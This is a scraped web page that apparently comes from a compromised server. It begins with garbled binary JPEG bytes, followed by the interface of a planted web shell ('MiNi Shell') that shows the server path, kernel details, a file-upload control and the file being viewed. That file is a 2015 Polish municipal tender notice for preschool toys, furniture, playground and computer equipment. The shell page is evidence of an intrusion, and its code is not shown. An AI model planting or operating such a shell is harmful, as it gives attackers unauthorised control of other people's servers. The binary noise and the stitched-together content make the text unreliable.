JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150817/210846-N-2015.html

<p class="kh_header"><b>Brzeźnio: Doposażenie oddziałów przedszkolnych 
w zabawki, pomoce dydaktyczne, artykuły plastyczne, sprzęt komputerowy, multimedialny oraz meble i wyposażenie do sal, szatni, kuchni i toalet 
w ramach  projektu Radosne przedszkole realizowanego przez Gminę Brzeźnio</b><br>
<b>Numer ogłoszenia: 210846 - 2015; data zamieszczenia: 17.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Oświaty i Wychowania w Brzeźniu , ul. Wspólna 44, 98-275 Brzeźnio, woj. łódzkie, tel. 43 820 39 17, faks 43 820 36 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeznio.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie oddziałów przedszkolnych 
w zabawki, pomoce dydaktyczne, artykuły plastyczne, sprzęt komputerowy, multimedialny oraz meble i wyposażenie do sal, szatni, kuchni i toalet 
w ramach  projektu Radosne przedszkole realizowanego przez Gminę Brzeźnio.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup wraz z dostawą zabawek, pomocy dydaktycznych, artykułów  plastycznych, sprzętu  komputerowego, multimedialnego oraz mebli 
i wyposażenia  do  sali, szatni, kuchni i toalet w ramach projektu Radosne przedszkole do oddziałów  przedszkolnych  w Gminie Brzeźnio.

2.	Projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Podziałanie 9.1.1. Zmniejszanie  nierówności  w  stopniu  upowszechnienie  edukacji  przedszkolnej. 
Wszelkie działania związane z realizacją projektu powinny uwzględniać uregulowania  dotyczące projektów współfinansowanych z funduszy europejskich. 
3.	Przedmiot zamówienia podzielony został na następujące  części zamówienia (zadania):

Część I przedmiotu zamówienia  - ZAKUP, DOSTAWA I MONTAŻ URZĄDZEŃ NA PLAC ZABAW
Część II przedmiotu zamówienia - ZAKUP I DOSTAWA WYPOSAŻENIA TOALET 
Część III przedmiotu zamówienia  - ZAKUP I DOSTAWA WYPOSAŻENIA DO KUCHNI I SPRZĘTU DO UTRZYMANIA CZYSTOŚCI                                                                                          
Część IV przedmiotu zamówienia  - ZAKUP I DOSTAWA POMOCY DYDAKTYCZNYCH, ZABAWEK  I MATERIAŁÓW PLASTYCZNYCH 
Część V przedmiotu zamówienia - ZAKUP I DOSTAWA MEBLI DO SALI DYDAKTYCZNYCH I WYPOSAŻENIA WYPOCZYNKOWEGO
Część VI przedmiotu zamówienia - ZAKUP I DOSTAWA SPRZĘTU KOMPUTEROWEGO I AUDIOWIZUALNEGO
Podane w opisach przedmiotu zamówienia nazwy własne nie mają na celu naruszenia art. 29 i art. 7 ustawy z dnia 29 stycznia 2004 r., Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych Zamawiającego. 
Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełniania tego samego poziomu jakościowego, merytorycznego oraz gwarantujące taką samą funkcjonalność jak produkty opisane w przedmiocie zamówienia. 
Jeżeli gdziekolwiek w niniejszej siwz pojawia się nazwa, marka lub typ wskazujący na konkretnego producenta, należy to interpretować, że określenie ma jedynie charakter przykładowy, a Wykonawca sporządzając ofertę może uwzględnić wyrób każdego innego producenta, który jest równoważny tzn. posiada co najmniej takie same lub korzystniejsze parametry wydajnościowe i jakościowe oraz standard wykonania w stosunku do podanych w siwz przykładów. 
Powyższe zmiany muszą być wykazane w załączonej tabeli Wykaz urządzeń 
i materiałów równoważnych i dołączone do oferty - załącznik nr 4 Brak wskazania 
w załączniku propozycji zastosowania rozwiązań równoważnych oznaczać będzie deklarację Wykonawcy, że przedmiot zamówienia zostanie wykonany przy zastosowaniu rozwiązań przyjętych w siwz. 
Uwaga:
Udowodnienie, że zastosowane rozwiązania są równoważne spoczywa na Wykonawcy na etapie składania ofert. Dokumenty potwierdzające równoważność należy załączyć do oferty (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
W sytuacji zastosowania rozwiązań równoważnych Zamawiający wymaga złożenia stosownych dokumentów uwiarygodniających parametry jakościowe lub użytkowe tych rozwiązań.
W przypadku zastosowania rozwiązań równoważnych do oferty należy dołączyć dokumenty potwierdzające, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego. Zamawiający żąda wówczas:
- instrukcji, kart katalogowych, certyfikatów, atestów, aprobat technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego w siwz. Zamawiający uzna za wystarczające załączenie z w/w dokumentów potwierdzających, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego.
Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań.

4.	 Wykonawca może złożyć ofertę na wszystkie części przedmiotu zamówienia, na kilka bądź na jedną. Każda część przedmiotu zamówienia będzie oceniana oddzielnie. Zamawiający wybierze ofertę najkorzystniejszą  dla poszczególnej części.
5.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości na okres zgodny z gwarancją producenta.
6.	Szczegółowy opis przedmiotu zamówienia poszczególnych części zamówienia zawarty jest  Rozdziale 16 SIWZ tj.:
5.1 Szczegółowy opis przedmiotu zamówienia dotyczący części I (sprzęt na place zabaw)  wzór załącznika nr 6.1. do oferty; 
5.2 Szczegółowy opis przedmiotu zamówienia dotyczący części II (wyposażenie toalet)  wzór załącznika nr 6.2. do oferty; 
5.3 Szczegółowy opis przedmiotu zamówienia dotyczący części III (meble, wyposażenie do kuchni i sprzęt do utrzymania czystości) - wzór załącznika nr 6.3. do oferty. 
5.4 Szczegółowy opis przedmiotu zamówienia dotyczący części IV (pomoce dydaktyczne, zabawki i materiały plastyczne) - wzór załącznika nr 6.4. do oferty. 
5.5 Szczegółowy opis przedmiotu zamówienia dotyczący części V (meble do sal dydaktycznych, szatni i wyposażenie wypoczynkowe)) - wzór załącznika nr 6.5. do oferty
5.6 Szczegółowy opis przedmiotu zamówienia dotyczący części VI (sprzęt komputerowy i audiowizualny)) - wzór załącznika nr 6.6. do oferty

7.	Miejscem dostaw są łącznie 2 szkoły podstawowe w Gminie Brzeźnio. Nazwy szkół, ich adresy oraz asortyment, który winien być dostarczony do danej szkoły zawierają załączniki nr 6.1, 6.2, 6.3, 6.4,6.5, i 6.6 do SIWZ.

8.	Część I -ZAKUP , DOSTAWA I MONTAŻ URZĄDZEŃ NA PLAC ZABAW

8.1.Przedmiot zamówienia obejmuje zakup wraz z dostawą i montażem urządzeń na plac
zabaw  dla dzieci  w  4  oddziałach  przedszkolnych 2 szkół podstawowych.
8.2.Rodzaj oraz ilość sprzętu wraz z wymaganymi minimalnymi parametrami zawarte są
we wzorze załącznika nr 6.1. do oferty (Rozdział 16 SIWZ). Wykonawca
zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach dla poszczególnych
szkół według załącznika.
 
9.	Część II - ZAKUP I DOSTAWA WYPOSAŻENIA TOALET
9.1. Przedmiot  zamówienia obejmuje  zakup  wraz  z  dostawą elementów wyposażenia toalet.
9.2.   Wymagane minimalne parametry oraz ilości poszczególnego asortymentu
opisane są we wzorze załącznika nr 6.2. do oferty (Rozdział 16 SIWZ). Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach dla
poszczególnych szkół według załącznika.

10.	Część III - ZAKUP I DOSTAWA WYPOSAŻENIA DO KUCHNI I SPRZĘTU
DO UTRZYMANIA CZYSTOŚCI

10.1.Przedmiot zamówienia obejmuje zakup wraz z dostawą sprzętu do sprzątania typu
froterka, odkurzacz oraz wyposażenia kuchni: sztućce, talerze, garnki, noże, 
pojemniki na żywność pojemniki do segregowania odpadów .
10.2.Rodzaj oraz ilości sprzętu i wyposażenia wraz z wymaganymi minimalnymi
parametrami zawarte są we wzorze załącznika nr 6.3. do oferty (Rozdział 16
SIWZ). Wykonawca zobowiązany jest dostarczyć meble i wyposażenie 
w pogrupowanych pakietach dla poszczególnych szkół według załącznika.


11.	Część IV - ZAKUP  I  DOSTAWA  POMOCY DYDAKTYCZNYCH,
 ZABAWEK I MATERIAŁÓW PLASTYCZNYCH 

11.1. Przedmiot zamówienia obejmuje zakup wraz z dostawą pomocy dydaktycznych:
 gry różnego rodzaju, układanki, plansze, figury przestrzenne, zestawy do liczenia
 itp., zabawek: zestawy tematyczne, lalki, domki dla lalek, ubranka,, koparki,
 betoniarki, auta itp. oraz materiałów plastycznych: papiery, bibuły, pióra, oczka,
 pompony, farby, kleje, mazaki.

11.2.  Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami 
zawarte są we wzorze załącznika nr 6.4 do oferty (Rozdział 16 SIWZ). Wykonawca 
zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika.



12.	Część V - ZAKUP I DOSTAWA MEBLI DO SAL DYDAKTYCZNYCH,    
            SZATNI I WYPOSAŻENIA WYPOCZYNKOWEGO

12.1.Przedmiot zamówienia obejmuje zakup wraz z dostawą mebli do sal
dydaktycznych, szatni: regały, biurka, krzesła, stoliki przedszkolne, ławeczki 
szatniowe oraz różnego rodzaju wyposażenia wypoczynkowego: puf, materacy, 
poduch, siedzisk itd.

12.2.Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami 
zawarte są we wzorze załącznika nr 6.5 do oferty (Rozdział 16 SIWZ). Wykonawca 
zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika.

 13.    Część VI - ZAKUP I DOSTAWA SPRZĘTU KOMPUTEROWEGO I   
          AUDIOWIZUALNEGO
13.1. Przedmiot zamówienia obejmuje zakup wraz z dostawą zestawu interaktywnego,  
ekranu projekcyjnego, rzutnika przenośnego, telewizora, radiomagnetofonu.
           13.2. Rodzaj oraz ilości materiałów wraz z wymaganymi minimalnymi parametrami 
zawarte są we wzorze załącznika nr 6.6 do oferty (Rozdział 16 SIWZ). Wykonawca 
zobowiązany jest dostarczyć przedmiot zamówienia w pogrupowanych pakietach dla 
poszczególnych szkół według załącznika..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.80.00.00-6, 44.81.20.00-0, 39.16.00.00-1, 39.16.10.00-8, 39.15.00.00-8, 37.52.00.00-9, 30.19.00.00-7, 22.47.00.00-5, 30.21.31.00-6, 32.00.00.00-3, 32.00.00.00-2, 32.32.00.00-6, 33.14.16.23-3, 39.71.34.30-6, 38.62.20.00-1, 44.41.00.00-7, 48.90.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dokonana zostanie na podstawie oświadczenia wykonawcy, o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dokonana zostanie na podstawie oświadczenia wykonawcy, o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dokonana zostanie na podstawie oświadczenia wykonawcy, o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dokonana zostanie na podstawie oświadczenia wykonawcy, o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych dokonana zostanie na podstawie oświadczenia wykonawcy, o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- w przypadku zastosowania rozwiązań równoważnych opisanym w szczegółowym opisie przedmiotu zamówienia wykonawca bezwzględnie zobowiązany jest dołączyć dokumenty potwierdzające, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda:
- instrukcji obsługi, kart katalogowych, certyfikatów, atestów, aprobat technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego w SIWZ. Zamawiający uzna za wystarczające załączenie jednego z w/w dokumentów potwierdzającego, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy wraz z załącznikami</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy, w szczególności zmiany umowy mogą  dotyczyć :
1)	wynagrodzenia; 
2)	warunków płatności;
Zmiany, o których mowa w ust. 1  mogą nastąpić w następujących sytuacjach:
     a)    zmiana wynagrodzenia i warunków płatności może nastąpić w przypadku zmiany stawki podatku od towarów i usług na dzień wystawienia faktury w stosunku do stawki obowiązującej w dniu podpisania umowy;
     b)    gdy zmiany są korzystne dla Zamawiającego.


3.Zamawiający przewiduje wydłużenie terminu związania ofertą na okres nie dłuższy niż 60 dni.
4.	Zamawiający przewiduje zmiany nazw, siedziby stron umowy, numerów kont bankowych i innych danych identyfikacyjnych.
5.	Zamawiający przewiduje zmiany osób odpowiedzialnych za kontakty, nadzór nad przedmiotem umowy.
6.	Zamawiający przewiduje zmniejszenie zakresu wynagrodzenia z przyczyn 
o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć. 
7.	Zamawiający przewiduje zmianę umowy w zakresie podwykonawców, jeśli Zamawiający będzie miał zastrzeżenia co do podwykonawców lub zmiany podwykonawców.
8.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom, mimo nie wskazania w ofercie takiej części do powiedzenia podwykonawcom.
9.	Wykonawca może wskazać inny zakres podwykonawstwa, niż przedstawiony 
w ofercie z zastrzeżeniem art. 36b ust. 2 ustawy Prawo zamówień publicznych.
10.	Wykonawca może wskazać innych podwykonawców niż przedstawieni 
w ofercie,  z zastrzeżeniem ary. 36b ust. 2 ustawy Prawo zamówień publicznych.
11.	Wykonawca może zrezygnować z podwykonawstwa.
art. 36b 2. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
Zmiany do umowy następują na pisemny wniosek jednej ze stron wraz z uzasadnieniem  konieczności wprowadzenia tych zmian.  
4. Zmiany niniejszej umowy wymagają dla zachowania swojej ważności formy pisemnej 
w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeznio.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Oświaty i Wychowania w Brzeźniu
ul. Wspólna 44
98-275 Brzeźnio.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2015 godzina 10:00, miejsce: Urząd Gminy w Brzeźniu
ul. Wspólna 44
98-275 Brzeźnio
I piętro - sekretariat, pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Radosne przedszkole
współfinansowany ze środków Unii Europejskiej w ramach 
Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZAKUP, DOSTAWA I MONTAŻ URZĄDZEŃ NA PLAC ZABAW.</p>
